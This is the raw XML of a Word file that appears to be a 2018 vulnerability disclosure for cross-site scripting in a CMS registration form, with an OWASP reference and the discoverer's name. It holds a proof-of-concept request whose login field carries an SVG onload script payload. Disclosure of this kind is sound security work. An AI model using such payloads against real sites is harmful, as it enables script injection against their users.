    <w:p w:rsidR="00F33948" w:rsidRDefault="00F33948" w:rsidP="00F33948">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csrf=803ee6c7fc318793f6378e0a7e22257ff8a7ea48&amp;login="&gt;&lt;svg/onload=prompt(1337)&gt;&amp;password=&amp;email=&amp;answer=&amp;register=Register</w:t>
      </w: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94" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="204" w:lineRule="auto"/>
        <w:ind w:right="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="204" w:lineRule="auto"/>
        <w:ind w:right="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00350C5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="228"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="227" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Discoverer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="66" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="66" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7" w:rsidP="00E631E7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="204" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Author: Nikhil Sahoo</w:t>
      </w:r>
      <w:r w:rsidR="00767A09">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRPr="00290E13" w:rsidRDefault="00E631E7" w:rsidP="00290E13">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Website: </w:t>
      </w:r>
      <w:r w:rsidRPr="00905339">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>https://www.linkedin.com/in/nikhil-sahoo-87204b106/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E631E7" w:rsidRDefault="00E631E7"/>
    <w:sectPr w:rsidR="00E63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E7"/>
    <w:rsid w:val="00290E13"/>
    <w:rsid w:val="00767A09"/>
    <w:rsid w:val="009C669B"/>
    <w:rsid w:val="00E631E7"/>
    <w:rsid w:val="00F33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C424"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{356DA5C0-8A09-4FC2-9E75-5AE28317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1E7"/>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E13"/>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Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00290E13"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00290E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620816">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="168512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monstra/users/registration" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="%20https://pradeepjairaman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Sahoo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nikhil Sahoo</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-25T18:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-25T18:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>